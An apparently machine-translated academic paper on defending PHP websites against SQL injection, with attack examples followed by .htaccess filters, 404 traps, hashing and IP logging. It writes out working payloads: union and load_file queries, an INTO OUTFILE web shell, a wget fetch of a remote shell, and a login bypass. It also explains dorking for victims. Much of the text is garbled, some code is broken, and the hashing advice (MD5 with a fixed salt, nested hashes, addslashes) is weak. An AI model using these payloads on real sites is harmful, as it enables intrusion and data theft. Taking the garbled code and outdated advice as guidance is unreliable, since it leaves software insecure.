Optimization of Multi-Agent Security Solution for

Prevent Web-Based System of

SQL Injection Attack

Mohammad Saeid Safaei Sadegh, Faraneh Zarafshan, Maryam Safari, Abouzar Rahimian

Department of computer engineering, Faculty of engineering, Ashtian Branch, Islamic Azad University, Ashtian,

Markazi, Iran

4 Memorial University of Newfoundland, Canada

Abstract. In this paper, after the implicit familiarity with malicious instructions called SQL Database, it has been tried to

introduce multiple - way works to prevent infiltration into the Database. Using some innovative ideas and combining some

algorithms, it has been tried to close the influence of penetration and seek to display the information of the database to the

destructive person.

An example of a Web scenario is given in PHP, and ways to penetrate it are displayed through an SQL attack, and then using

reverse engineering to address the Attacker 's goals, it is designed to capture the remaining traces of the attacker in order to take

the necessary measures to capture or prevent the attacker from entering into an Attacker 's IP address.

Keywords: SQL Injection, Bug patching, Infiltration, Error, HTAccess. , Logging

1. Introduction Databases are usually the heart of a website, or a Web based or Web Enabled program. Because the information that

should be displayed on the site is stored in them. Based on various programming models, a combination of a database

and a scripting language or coding, and possibly several layers of another, can be written to suit customer satisfaction

and is convinced to pay for programming costs.[1]

As we know, thousands of exploits have been designed to threaten and ultimately attack web servers. Among these

potential threats, SQL Injection has been able to make the head and neck ahead of and ahead of other rivals as their

most influential, easiest and most sophisticated one. SQL Injection attacks are reported daily on a large number of

web sites that provide dynamic information to their audience. Why is Dynamic? The structure and design of Dynamic

Sites makes it possible to use the MySQL database or any other database that is related to SQL, so this makes them

an attractive subject for attack. Since the SQL Injection attack is directly related to the database, so in order to prevent

SQL Injection and to continue the discussion in this article, there is a need for a proper understanding of SQL.

Sometimes, even though all aspects of programming have been met, you may notice some holes or errors in the

program. If these holes are due to bugs in tools used in the program, such as databases, installing SERVICE PACKS

or upgrading to a new version of these programs can solve the problem, but in most cases, the forms and holes In a

Web application, the bugs related to "SQL Injection " are related. Therefore, in this article, attempts are made to

introduce the necessary measures for the reader by providing innovative and multivendive methods to prevent these

attacks. [2]

2. The concept of SQL Injection attack It is not necessary to explain that SQL is the language used to work with a database management system such as

MySQL. SQL Injection is a code injection method that uses a security vulnerability in the database layer of an

application to attack. Although SQL Injection is often used to attack websites, it can be used to attack any SQL

database. Injection, on the other hand, means "injection", and in general, SQL Injection is a process by which hackers

create commands from SQL so they can simply use these forms to input these commands into The database is intended

to achieve its goals, which can include data calling, data deletion, change, and other actions.[3]

As you know, SQL language contains commands that perform operations on database data. Each query on the database

can contain multiple commands. The most common of these commands are: Select, Insert, Update, and Delete. So, to

define an SQL Injection attack, one can say that if someone can unauthorized access to our database using these

commands, or access information, change or possibly delete it, and this It performs an operation using the

programmer's weakness in splitting the user inputs and SQL commands, the so-called unauthorized execution of SQL

Injection Attack commands. This vulnerability is among the top ten Web vulnerabilities in 2007 and 2010. [4]

3-Types of SQL Injection attacks to the database The reactions and reactions that the databases present in the injection process have caused various types of injections

to occur over time. Here are some types of attacks.

Union Based SQL Injection. Injection is based on the combination of two QUERY types of injections that

combine the results of the two sql commands through the union and result in one result.

1. query.php?id=20 UNION SELECT 1,2,3,4,5

2. query.php?id=20

3. UNION

4. SELECT 1,2,3,4,5

In some database versions, like the MYSQL version 5 above, there is an additional table called Information

Schema, in which all system information, including the name of all tables and columns, is found to help

in accelerating the extraction of information. , Because when using the Information_schema table, it is

aware of the existence of a table named admin with two columns of password, username, all that is

necessary to select the table data and display their content.[5]

Error Based SQL Injection. Injection-based injection An injection type that injects an operation with regard

to errors in the database is done in such a way that the information is extracted and the procedure is in such

a way that we inject instructions to display the name of the column and the tables in the form of an error.

Then we can use their information to further inject.[6]

Blind Based SQL Injection. Blind injections, this type of injection does not display any information or error

from the database, and the hacker guesses the results only through the True / False responses received from

the database.

In terms of the division of the blind injection, it can be divided into two categories

Boolean Based. The results are True / False. When injected If the website page is displayed correctly, the

injected instruction is True and if it is not displayed correctly, it is false.

Time Based. The results are True / False based on time. When injected, if the website is loaded after the

delayed delay using delay functions (for example, 2 seconds), the correct condition is True and otherwise

false.

Read and Write File. Some functions on sql allow us to read a file from the system or upload your own file

into the server.

Site / index.php? id = -7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 load_file

(/home/buscocas/www/login.php)29----

The result of this example is that PHP file codes are displayed on the web page, and if it encounters an error, the file

path can be encoded in hex.[7]

Site / index.php? id = -7367 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

load_file ( 0x2f686f6d652f627573636f6361732f7777772f6c6f67696e2e706870), 29—

The file creation operation is possible with the sql commands:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO

OUTFILE '/var/www/cmd.php '--

If an error occurs, we encode the path using hex:

Site.com/page.php?id=-85 union select 1,2,3,4,'<?php system($_GET[cmd]) ?>',6,7,8 ,9,10,11 INTO

OUTFILE '0x2f7661722f7777772f636d642e706870 '—

So far, a file named cmd.php has been created that allows us to run the command line with which we use the following

address to run it:

http://Site.com/cmd.php?cmd=ls

With this code, the file list is displayed in the root portion of the site, now we can download the shell or file to the

host via this command line.

http://Site.com/shell.php?cmd=wget http://mysite.com/shell.php

Here, the php file is downloaded from the path specified by the host and can be executed.

http://Site.com/shell.php

Note: The LOAD_FILE function is used to read and call existing files.

Note: You can create the contents of X into the specified file through into outfile. SELECT X INTO OUTFILE

'test.php'

Note: Ls and wget are Linux commands that are used to list files and download a file respectively.

4. Victim Selection (Destination Attack) The first step in implementing an SQL Injection attack is to find a vulnerable website. This step may be the most time-

consuming to devote the total time needed to complete the attack. Today, most websites have kept themselves isolated

from SQL Injection threats using their own techniques and techniques. This means that this step means finding a

vulnerable website takes a lot of time. One of the easiest ways to find vulnerable websites is Google Dorking. A Dork,

in fact, is a specific search request to find websites that match the input parameters within this request. Below are

some examples of Dork, which can be used to find a vulnerable site against the SQL Injection attack. Just ask any of

these requests within Google.[8]

The key to all these Dorks is that they all focus on websites that generate dynamic content from the SQL database

using php scripts. Remember that an SQL Injection attack works on any SQL database, but in the meantime, php-

based websites are usually more suitable for this task because their usage is consistent with any field and usually has

The valuable information in their database is that the hacker intends to hack it. As regards the results of the Dorks, it

is imperative that websites that are output from Dork's output are not necessarily vulnerable and that each of them

should be tested in the next step to determine which one They have the desired vulnerability.[9]

5. Penetration methods To understand how this vulnerability works in practice, the following hypothetical address is considered:

www.site.com/page.php?id=5

At the above hypothetical address, the page.php? Id = 5 section consists of a query whose code is as follows:

1. $ sql = "SELECT * FROM logs WHERE id = $ _ GET [" id "]; $ result =

mysql query ($ sql);

In the above code, the Query is located in the sql variable and the sql variable is executed through the mysql_query

function and in fact the overall result is placed inside the result variable. The problem with this code is that the id

parameter is called through $ _GET without limitation. So the main form of the above address before running the

query is as follows:

www.site.com/ SELECT * FROM logs WHERE id = 5

And when it's done in the url section of the site, the injection procedure is as follows:

www.site.com/SELECT * FROM log WHERE id = 5 union select null,

concat (user, password) from mysql.user-

The result of this injection is the disclosure of database users information. Of course, url is not the only way to do

this attack, and this attack can also be done through inputs such as a form or a cookie.

for example:

2. query = "SELECT * FROM users WHERE

3. uname= $_POST[‘Username‘]

4. AND

5. password= $_POST[‘Password’];

In this pseudo-code, it is expected that only when the username and password are entered correctly is the login action,

but with a simple trick you can enter the username so that without the password being checked, the login action Be

done to the site. Instead of entering a username and password, enter the following statement:

'' OR 1 = '1' -

In this case, the SQL statement will run as follows:

1. SELECT * FROM users WHERE

2. uname=’’ OR 1=’1’ --

3. AND

4. password=’’;

In the SQL structure, phrases are not executed after - and 1 = 1. An expression is always true, so the user is verified.

In this way, without the username and password, and only by using SQL injection, the database can be entered into

the site's user interface.

6-Ways to Detect Vulnerabilities In order to determine how vulnerable a website is to a hacker's hacker tricks in relation to the SQL Injection attack,

we can point out some of the infiltration parameters that we will look at below.

Examining HTML Codes. The HTML code of the home page and other pages are likely to be hacked,

and the sql injection test is performed on queries that are in the form of a link or form of data submission.

about us In the above codes, there is a link that can be caused by an SQL query.

(site.com/about.php?id=2)

To perform the test, characters (such as quotes) are placed at the end of the URL (url), and if it encounters previously

known errors, it means vulnerable to sql injection.

site.com/about.php?id=2 '

site.com/about.php?id=2 and 1 = 1

Known errors for the availability of sql injection vulnerabilities for the various databases are as follows:

MYSQL. You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server

MSSQL. Unclosed quotation mark before thecharacter string

ORACLE. ORA-01756: quoted string not properly terminal

ORA-00933. SQL command not properly ended

And the reason for these errors is that the input to the database is not limited and the characters sent along with other

commands are sent to the database.

Using Scanners. Using existing scanner software, you can scan the websites you want. One of the most

famous scanners is the Accunetix Web Vulnerability Scanner.

Examining the HTTP header. When opened with a web browser, it actually communicates with the

server through the HTTP protocol, and when the request is sent to the web server through the protocol, the

HTTP header next to the request is sent to the server. When the server responds, this header file is also placed

next to it to ensure that the connection is correct. When connecting to the server, the server file the server

along with the request to the server and the returns returned from the server; this header file contains fields,

one of which is the HTTP code.[1 0][1 1]

7. Common Ways to Cope with SQL Injection There are several ways to prevent such events from happening to different programming languages, which will be

discussed in more detail.

First, consider the following in designing and using the database:

1- Use users with low access levels to connect to the database as much as possible. This does not prevent SQL

Injection, but it helps to prevent someone from executing malicious code on the database, and thus, if there is a SQL

Injection, the attacker will have less power of maneuver.

2- Always store important information such as passwords encrypted in the database. This does not prevent SQL

Injection, but it does not allow information, such as passwords, to easily gain if an attacker penetrates the database.

3- Commands executed in the database. Although this does not help prevent SQL Injection, it allows the programmer

to track down and fix errors by seeing executables. You can use the databases that have the capability to register the

commands, or use the programming language used to store them in a safe place.

8. Related Work To Prevent SQL Injection in PHP Programming 1. Ensure the correctness of the types of variables. In PHP, there are a variety of variables. You can control the type

of input using functions such as ctype_digit and ctype_alnum and other functions of the ctype family or gettype

function. You can also ensure that the regular expression (PCRE) is accurate.

2. If the number is to be entered in the SQL statement, make sure that the input is a number, or make sure the input

type is always changed with a function such as settype or intval, or floatval, etc., if it is to be entered with functions

such as is_numeric.

3. Inputs that are of string type with the database functions to be escaped (like mysql_real_escape_string or

sqlite_escape_string or ...) and if the database does not have such a function, use functions such as addslashes or

str_replace. Work done. This action causes the character '' not to affect the structure of SQL and the input as a variable

to be ordered and not affect the command.

4. Using stored procedures is one of the best ways to prevent SQL Injection in databases that have this feature. But

unfortunately, all databases do not have this feature.

5. In no case should the error occur in the database to the user, because displaying these errors can allow the attacker

to know what happened in the database. In PHP, there are several ways to prevent errors from being displayed. One

of the most famous ones is using the @ operator before the desired instruction. When this operator is used, PHP

ignores the command error messages.[1 2]

9. Optimization of SQL Injection Prevention Strategies in PHP Programming: As you have already mentioned, a series of ways to prevent malicious operations is presented here with more

innovative ways to address this issue. It should be noted that the use of any of the following methods alone can not

guarantee the security of the code. It should be emphasized that multi-factor solutions and the combination of solutions

should be used to enhance security.

9.1 Using Page 404 as a Trap: Technically, the 404 error is a client-side warning that the user is creating. This warning is most likely to occur when

the user inputs the page address incorrectly or there is no address of the page that they typed and has not previously

tried to obtain information about it. Another factor is the removal of the page, and the owner of the site has not

redirected the old pages to the new pages. [1 3]

When a user clicks on a link whose page is deleted, it encounters an error of 404. For this purpose, it's best that any

page that is deleted is redirected to its associated page. In addition to the above explanations, it is also one of the ways

to prevent and put an end to sending Dork to the pages so that the programmer on pages with the GET command

receives a specific field of data base database when it does not find it in the database. The page will be redirected to

404, so this will, in addition to not displaying the SQL errors that we mentioned earlier, pose a complete impasse for

Exploit robots such as carrots and ... to better understand Note the following:

Suppose the id value is sent to a page via $ _GET.

$ sql = "SELECT * FROM logs WHERE id = $ _ GET [" id "]; $ result = mysql query ($ sql);

If only the above code fails, if the value of id is somewhat unrealistic, the page itself responds and, at best, displays a

blank page, and this will open the hacker's hand to send other Dorks as ids, but with Change the code above to:

1. $sql=”SELECT * FROM logs WHERE id=$_GET[“id”];

2. $num=mysql_num_rows($sql);

3. If ($num==0){ header('Location: /404.php'); }

He directs him to page 404. Also, for higher security, you can set another condition in the php header, including:

9-1-1- Determining the data type. For example, according to the following statement, the type received in the id

variable is just the number.

$id = ctype_digit ($_GET ['id']);

9-1-2- Receiving multiple IDs. Receive the header of the submitted article and compare it with the value of id to

ensure the correctness of the page, otherwise it will be redirected to 404. For example: In addition to the value of id,

the name of the subject's titer or an identifier of that stored in the database must also be received.

1. $sql=”SELECT * FROM logs WHERE id=$_GET[“id”] AND titr=$_GET[‘titr’];

2. $num=mysql_num_rows($sql);

3. If ($num==0){ header('Location: /404.php'); }

9-1-3- Censoring suspicious characters. If you put any phrases that use suspicious characters such as + or - or ...,

delete the string received by $ _GET ['titr'] by censoring and suspicious phrases.

for example :

1. $titr=addslashes ($_GET[‘titr’]);

The use of this kind of solution is very useful for increasing the security of the web, but it should be kept in mind that

with the increase in security, the handwriting of the blog will be closed a little. For example, in the third model

mentioned above, the blogger is not allowed to use the phrases that contain suspicious characters in the subject field

and must, according to the CMS law, designate what the site designer is considering.

Also, many users and even web designers may look at page 404 like other site pages. But this page can play important

security role on the site. In fact, site security experts check the number of requests that the 404 page was summoned

by an IP to check the site's chance of hacking. In a simpler language, if a particular IP is sending a large number of

requests to the server over a short period of time, resulting in code 404, the likelihood that the IP is intended to hack

the site by an individual or a malicious software is very high. A domain owner must block these IPs so that attackers

can not access the site. There are many ready-made plugins available for this purpose on the Web, and their

introduction and explanation is not within the scope of this article.

In addition, it can be used to eliminate the presence of broken links that include web links or URLs on the website

that are unreachable. Broken links are URLs on the website that do not work or will not open. Broken links are

considered to be a negative aspect because they are part of a site and if they do not resolve, they can be damaged in

the long run in the long run. Marketers should continually check broken links and fix them before they can harm these

links. When the crawl search engine crawls and collapses with a broken link, the site scrolls down to a halt, so the

search engines find site access weak and, as a result, can hurt your SEO over time. [1 4]

9.2 Using the HTACCESS file: According to the official Apache website, .htaccess files (or distributed configuration files) provide a way to make

configuration changes at the level of directories. Each .htaccess file contains one or more Apache commands called

directories. Each .htaccess file is placed in a specific directory. The directives inside each .htaccess file apply only to

the directory where the .htaccess file is located, plus its sub directories.

On web systems that are generally written in html or php programming languages and are hosted on a Linux server,

an .htaccess file is created to create configurations in directories and folders on the Apache web server. This file It's

very useful when it comes to root access to control Apache.

The Htaccess file is anonymous and is only identified by the Htaccess extension.

This file is known as distributed configuration files. You can access the files that you can use with this file:

Redirection control

Control physical access to files and folders 3.Controlling the display of Apache errors

URL Rewrite settings

Block one or more specific IPs or an IP range

Put a password on a specific folder

Cache Settings and Expire Date

Apply some changes to default PHP, MySQL, and Apache settings

Unblock to display all files or one or more files with a special extension

Move the pages to a specific page

Introducing a Default Document in a specific folder

Using this file is not recommended in all cases, as besides many capabilities, the use of this file will increase by

activating a website hacking function, and the way hackers penetrate hosts host generally through the active functions

in the .htaccess file. It becomes smooth.

The settings in the .htaccess file are applied to the current directory and its subfolders, and by placing another htaccess

file under the specific folder the parent folder settings are violated.

One of the uses of this URL Rewrite file is the most common use of URL Rewrite to convert long URLs to addresses

that are short and easily memorized. On IIS, you can also install the URL Rewrite plugin. In Apache, this is known as

mod_rewrite, and IIS refers to that URL rewrite. IIS has the ability to read and translate mod_rewrite code into URL

rewrite.

for example :

RewriteRule Home $ /first/second/index.php

The above command means that the index homepage is typed to run the index.php file in nested folders.

With a bit of care in this seemingly simple application, one can see its importance in the security issue.

For example, where the php file name is not required for some reason, it can be restricted to RewriteRule.

Now consider the following example:

1. RewriteRule ^USERS-EDIT/([0-9]+)/(.*)$ /cms/user/useredit.php?id=$1 [L]

This command means that instead of getting the id value under the variable $ _GET, you can use a slash, and then

use the id and slash values and use a deceptive statement.

for example

x.com/useredit/10/SomeText.html

Exactly follows the same path that follows goes through.

x.com/cms/user/useredit.php?id=10

But with the difference that id is hidden first, secondly, the path of the php file is unclear, and thirdly by putting the

phrase "Sometext.html" or any other words, the hacker misses the path to another path and searches for a file with a

suffix like html that looks like this There is no web directory at all.

Also, with a set of rules similar to those in the next example, it creates a censorship or stalemate in the docking section

for the top site and virtually shortens the hacker's hand for at least a SQL Injection exploit.[1 5]

1. RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|inser

t|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]

2. RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]

3. #RewriteCond %{QUERY_STRING} ^.*\.[A-Za-z0-9].* [NC,OR]

4. RewriteCond %{QUERY_STRING} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|).* [NC]

5. RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

6. IndexIgnore *

7. Options –Indexes

9-3. Usage of Hash Functions Hash functions is a basic category of security science called unidirectional hash functions. It is a function that receives

a long-term, long-received thread or continuous string with a constant output length. The hash value is the result of a

total content of the text or input string that can be considered digital fingerprint. Hash functions are an important tool

in cryptography and a key role in efficient gaming and secure information processing, which is widely used in a large

number of security protocols and mechanisms.

Hash functions are used to support digital signatures. Hash functions and compression functions in encryption used

for privacy and authentication.

Obviously, the hash functions create one-way encryption, which means that the post-hash text can not be returned.

The same functionality can be useful for password cryptography of users, so that the password is stored in hash in

databases. One of the hash functions is MD5 and sha1.[1 6]

9-3-1. MD5. MD5 is a cryptographic method widely used as a cryptographic tweeter function. This algorithm takes a

different length string as input, and generates a message summary of MD5 or fingerprint with a length of 128 bits.

The MD5 algorithm is a development of the MD4 algorithm, with the difference that the MD5 is slightly slower than

MD4 , but its design has been very conservative.

The MD5 was designed to feel that THE MD4 was accepted because of its high speed but it does not have the proper

securityin critical situation The MD5 slower than the MD4 slowerin spite of its security. This algorithm is the result

of influencing the views of a number of MD4 users, along with some changes in the structure of the algorithm to

increase its speed and power. [1 7]

9-3-2. SHA1. Sha1 is the hacking function in the cryptographic category. Designed by the National Security Agency

in the United States and published by the National Institute of Technology and Standards. SHA-1 is actually the

beginning of the words "safe hole algorithm" or SHA-1 in English (Secure Hash Algorithm 1). There are currently

three hashing algorithms from this group with versions 0, 1 and 2.

The SHA-1 algorithm is very similar to the Sacha-0, but basically eliminates the basic issues that existed in version 0

that weakened the algorithm. Version 0 is used in a small number of security software applications and is not widely

used. While version 2 of this algorithm is very different from versions 0 and 1. Secure Hedge Alignment with Version

1 is currently the most popular Hedging algorithm from this family and is now used in many security software and

security applications. In 2005, the security errors of this algorithm were identified in the subject of mathematics, which

indicated that this algorithm might be broken. And since then, there was a need for a better algorithm in this area.

Although this possibility has not yet become a reality, no successful attack has been made on this algorithm. Sacha-2

is from some SHA-1. With this explanation, another algorithm is under development, with version 3, which NIST

holds for a race like the previous ones, which will take place by the end of 2012, in order to select the best algorithm

with this name. [1 8]

After introducing hash functions, one example is its application: For example, the "123456" password is in the user's

password field, assuming that with all the above security considerations, a page has already left behind the author's

eyes and did not apply security measures, and the attacker was able to use the exploit to Access database tables. Now,

if you see the password 123456 against the username admin, it seems like the entire programmer's attempt to keep the

website safe and the attacker can easily defeat the website after logging in to the login screen. To prevent this, however,

you need to provide a solution where the password is encrypted in the data base field, so the best solution is to use the

Hash functions. for example :

1. @$username = addslashes($_POST['username']);

2. @$password = Md5(addslashes($_POST['password']));

Now, with the above example, you can not guarantee the security of a field again, because password-protected

passwords stored in a database or operating system may sometimes be in the hands of an attacker. Here, the discovery

of the password is desirable because: Instead of hitting the database tables, the attacker can simply login to that system

with the password and view or edit the necessary information. In some SQL Injection attacks, the user can only view

the information and can not edit it (or at least it can not easily make custom edits on it), but if he can get the password

with respect to his hash, he can easily access the system Enter. On some systems, where security is very important

and critical, some information (file / database) is encrypted with the same application password. So without knowing

that password, access to the file or database is not necessarily useful. In some other systems, there are several admins.

If any of them can discover another password (on the hash it is available to him), he can log in as another and perform

his own vandalization and record it as another admin! Most people use a specific password somewhere, for example,

their bank password is the same with their email password with their student password on the university site! If the

attacker, for example, infiltrated the weak site of the university, would discover the password for that person, he would

probably be able to access the other user accounts on the same site with the same password. There are methods for

attacking hash, which can help them with the help of good hardware (such as leased supercomputers that perform

complex calculations every few seconds) within a reasonable time (less than a week) to weaker hashes (such as MD5)

penetration That's why today's stronger cannons like SHA-512 are used. So with regard to the current situation, we

need to further restrict the terms of disclosure of the password, which we have two solutions to here.

Solution First - Use Salt Spray. In cryptanalysis, salt contains random bits that generate entries of a one-way

function. The other input is usually a password or pass-phrase. The output of a one-way function can be stored instead

of a password and used to authenticate users. A one-way function usually uses an iterative function. Salt can be

combined with a password and function as a key derivation function such as PBKDF2 in order to generate a key for

use with a cipher or other encryption algorithm. In specific applications for password authentication, salt is stored

with one-way output function. Initially, Unix systems used 12-bit salt, but current implementations use 48 to 128-bits

salt. Previous versions of Unix used a password file (etcpasswd) to store hashes of salt passwords.

The point here is that in older versions of Unix, Salt is stored in the passwd file with the hash of the Salt password in

cleartext. The password file was publicly readable for all users of the system. This file must be readable so that the

user access level softwares can find the username and other information. Therefore, password security is only

supported by one-way functions. [1 9]

In the advanced shadow password system, password hashes and other security information are stored in an unpublished

file to reduce concerns. However, this information remains for the installation of multiple servers that have a

centralized password management system. Salt also protects you against rainbow table attacks by extending the length

of the password and increasing the complexity of it. If the rainbow tables do not match the password length and

complexity, the password will not be found. Even if the password is found, it is necessary to remove the password

from the password so that it can be used.

Salt also slows down the dictionary attack and brute-force attack to break passwords. Without salt, an attacker will

suffice to guess every password and compare it with all hashes. But with salt, all probabilistic passwords have different

salts, so that every conjecture for each salt should be hashed, and this operation is very costly to calculate the hash.[2 0]

The other advantage of salt is when two users may use a password or a user uses a password on two machines.

Without salt This password is stored in the same password with the same token. It's obvious that the two accounts

have the same password and can be accessed by knowing one another account. With salt, the password is hacked with

two random characters, so there are differences even if two accounts use a password and none of them can be detected

even by reading password files. Optimize the example above:[2 1]

1. @$username = addslashes($_POST['username']);

2. $salt = ‘@#$%^&’;

3. @$password = Md5(addslashes($_POST['password'] . $salt));

The second solution - Use your functions in hash. Due to the abundance of libraries in the md5 and sha1 functions,

one of the most useful ways to get a post as a password is to use your functions in the hash. For a better understanding,

consider the following example:

1. @$password = md5(sha1(md5(md5($passi. $salt) + sha1($passi. $salt)) + md5($passi. $salt)));

Of course, it should be noted that in the case of using the hash of doubles, some scholars' arguments cause the problems

of non-interoperability of functions, and sometimes can reduce the value and the power of encryption, but the number

of reasonable (not very large) steps in the use of weavers The hash functions of this theory are rejected. So at best, for

encryption, you can use separate dedicated servers that need authentication and use a specific hardware device

connected to a server, such as YubiSHM, which recommends this method to people who currently have more than

100,000 users. [2 2]

Gets Finally, it should be noted that cryptography should use a well-tested modern hash hierarchy such as sha3,

Whirlpool, RipeMD, SHA512, SHA256 or good key design Streching algorithms such as Bcrypt, PBKDF2 and

Scrypt. .

10. Logging Nowadays, with the growing data and the need of individuals to collect and classify them, the threats facing the

intelligence systems in order to destroy them are increasing. Nowadays, in modern computing and computer systems,

the most reliable way of knowing the threats of search and study in the entire system's activities is at the host and

server level and at the network level, and to find the logical link between them. The most important thing in preventing

these types of attacks is to separate unreliable data from commands and queries. The logs contain highly critical

information about all events related to applications, services, and operating systems. More or less, all today's systems

and applications have the ability to create and collect logs of their own activities. Web servers always record all their

operations in a log file. It soon became apparent that these logs of files that can be read by an application can provide

data about the popularity of a website. In this way, the log file analysis software appeared. The first real business

analyzer log was built in 1994 by IPRO. [2 3]

Logs are used to identify security threats and make changes aware. The logged information in the log helps the

programmer to troubleshoot errors. In fact, without the study of logs, there is no way to fix many errors. In many

cases, the only way to keep track of security problems and threats is to monitor continuously and without interruption

the logs of the operating system.[2 4]

Recent studies have shown that over 70 percent of security implications have been gained through an internal agent

in the organization, while the use of firewalls and intrusion detection systems only contributes to increasing the

security factor in non-organization attacks.

The only way to identify internal threats is to monitor integrated operating system logs. For example, we can refer to

the section on page 404 if pages such as 404 or functions were detected on some web pages to detect incorrect or

unauthorized access to a web page. The person (intruder) receives the IP of the person in charge of blocking him. .

One of the best ways to identify him is to use a tab in a database called Suspect, which can be stored in the same way

as the pseudo-code below, and then use the admin policies, for example, after 10 times Repeated access to the site. [2 5]

1. $sql=”SELECT * FROM logs WHERE id=$_GET[“id”] AND titr=$_GET[‘titr’];

2. $num=mysql_num_rows($sql);

3. If ($num==0){

4. $ip=$ip=$_SERVER['REMOTE_ADDR'];

5. $sql = "INSERT INTO Suspect (ipaddr) VALUES ($ip)";

6. mysqli_query($link, $sql);

7. header('Location: /404.php');

8. }

Given the attacker's IP storage, there can be at least one log of unauthorized activity on the website.[2 6]

Discussion:

If viewed, based on the statistics from the Alert Logic Institute, up to 55% of cybercrime attacks against web-based

systems are via the SQL Injection method.[2 7] In this paper, the reader introduces methods for detecting vulnerabilities

by examining HTML code, using The scanners and header of the HTML header are aware of the existence of bugs

and Web sites. And then, following his familiarity with a variety of SQL Injection attacks, general approaches to

blocking penetration, such as lowering user access levels, encoding important information in the database, and

recording activity Introduce users to the database and then review the work done for the correctness of the variables,

Ten of Storeprocedure and the parameter variables were analyzed. Then, methods have been developed to tighten the

deadlock for the attacker, such as using page 404, using .HTACCESS and encoding the data as hash in the database,

and as a result, an algorithm for logging off unauthorized activity and Trapped the attacker.

Also, according to the tests carried out using the software called carrot, each of the methods used to prevent the SQL

Injection process discussed in this article has been used to help the programmer to act as an impasse for penetration.

To the striker.

The best way to use the rules included in .HTACCESS was to act as a solid barrier and to retreat to Dork to prevent

intrusion.

Conclusion:

htaccess45%404 page

37%

hashing code14%

other4%

Method to PreventSQL Injection

Agent 3:

404Trap

Agent 1:

HTACCESSConfiguration

Agent 2:

Hashing and Salt

Agent 4:

Logging and Tracking

User Name : ………….

Password : …………….Query Check

Address Bar

Multi-Agent SQL Injection Diagram

If you look at it, this article attempts to introduce the reader to the concept of SQL Injection and discuss the various

methods of attacking and threatening the attackers in this way to the website.

Comparison of Agent in single - factor mode mode:

Negatives Attack Prevention Attack

Detection

Source Code

Adjustment Agent

Can 't prevent attacks

through form

Delete the address of the

PHP files No Detect No Needed HTAccess

It 's only meant to

cipher, and it 's not

going to tell the

loneliness of Attock.

If the attack succeeds, it

displays the encrypted

information that lacks

credibility.

No Detect Needed Hashing and

Salt

It should be directed

to this page by

another agent.

In case of attack, the

transfer process is carried

out to the reporting process.

Detect Needed 404 Trap

The possibility of a

mis - log in case of

lack of data base

After moving from the

broken link, he stores the

attack on the base and

registers the ip.

Detect Needed

Logging an

Tracking

Also, with the implementation of codes through the PHP language, we have attempted to turn the penetration into

practice into a dead end and bring the reader to this level of knowledge, which can, with a brief examination of what

has been discussed, secure his website. To ensure such risks.

As a result of all the topics discussed, it is hoped that there will be little help in improving the level of security of

programmers.

In order to open the boundaries, this paper proposes:

1- Follow specific steps to roll out the .HTACCESS file, and add new algorithms and techniques to its performance.

2- Due to the fact that in this article the deadlines are exclusively addressed to the CMS, you can deal with the

security of the hosting environment as a lower layer

REFERENCES

[1] A. Tajpour, S. Ibrahim and M. Masrom, “SQL injection Prevnetion and detection Techniques,” International Journal of Advancements in Computing Technology, vol. 3, no. 7, pp. 85-91, August 2011. [2] The Open Web Application Security Project, “OWASP Top ten project” https://www.owasp.org/index.php/

Category: OWASP_Top_Ten_Project. [3] A. Ciampa, C. A. Visaggio and M. D. Penta, “A heuristic-based approach for detecting SQL-injection vulnerabilities in web applications,” in Proceeding SESS '10 Proceedings of the 2010 ICSE Workshop on Software Engineering for Secure Systems, New York, 2010. [4] Behzad Moradi / Sokan Academy / Whats the Sql Injection In PHP [5] Advanced SQL Injection (Defcon 17) by Joseph Mccray [6] Abas Hoseini / World of SQLi [7] SQL Injection Attack and Defence by Justin Clarke. [8] K. Amirathimasebi, S. Jalalinia and S. Khadem, “A Survey of sql injection defence mechanisms,” in International Conference Internet Technology and Secured Transactions ICITST 2009, 2009. [9] The Web Application Hacker’s Handbook by Dafydd Stuttard and Marcus Pinto [1 0] Z. Jan, M. Shah, A. Rauf, M. Khan and S. Mahfooz, “Access control mechanism for web databases by using parameterized cursor,” in Future

Information Technology (FutureTech), 2010 5th International Conference, 2010. [1 1] R. Dharam and S. G. Shiva, “A framework for development of runtime monitors,” in Proceedings of the

International Conference on Computer & Information Science (ICCIS), Kuala Lumpur, 2012, pp. 953-957. [1 2] Xiang Fu and K. Qian, “SAFELI – SQL Injection Scanner Using Symbolic Execution,” in Workshop on Testing, Analysis and Verification of Web Software, July 21, 2008. [1 3] A. Moosa, “Artificial Neural Network based Web Application Firewall for SQL Injection,” World Academy of Science, Engineering and

Technology, vol. 40, pp. 42-51, April 2010. [1 4] Z. Lijiu, Q. Gu, S. Peng and X. Chen, “D-WAV A Web Application Vulnerabilities Detection Tool Using Characteristics of Web Forms,” in

Fifth International Conference on Software Engineering Advances (ICSEA), 2010, Nice, 2010. [1 5] Proper / Web Developer Island / Whats The .Htaccess and How to Working [1 6] Hamideh Ardalan-Ali Naser Asadi/ The 4th National Conference on the Application of New Technologies in Engineering Sciences/Hash

Function in Crypto [1 7] M. Ruse, T. Sarkar, and S. Basu, “Analysis & detection of SQL injection vulnerabilities via automatic test case generation of programs,” in Proceedings of the 10th IEEE/IPSJ International Symposium on Applications and the

